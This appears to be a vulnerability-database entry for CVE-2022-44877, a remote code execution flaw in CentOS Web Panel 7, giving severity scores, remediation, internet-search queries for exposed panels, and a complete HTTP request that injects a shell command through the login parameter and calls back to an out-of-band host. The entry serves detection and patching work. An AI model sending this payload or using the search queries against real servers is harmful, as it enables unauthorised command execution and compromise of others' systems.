🔙 목록으로 돌아가기

CVE-2022-44877: CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution

TitleCentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
AuthorFor3stCo1d
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationUpgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94457
CVE IDCVE-2022-44877
CWE IDCWE-78
Shodan Queryhttp.title:"Login | Control WebPanel"http.title:"login | control webpanel"
Fofa Querytitle="login | control webpanel"
Tags cve cve2022 packetstorm centos rce kev control-webpanel vkev vuln

🔍 Vulnerability Description

CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.d5jmv89le0o4h55gvo50qjckg3ji9zb9e.oast.pro) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
Connection: close
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=root&password=toor&commit=Login

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44877.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-44877.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A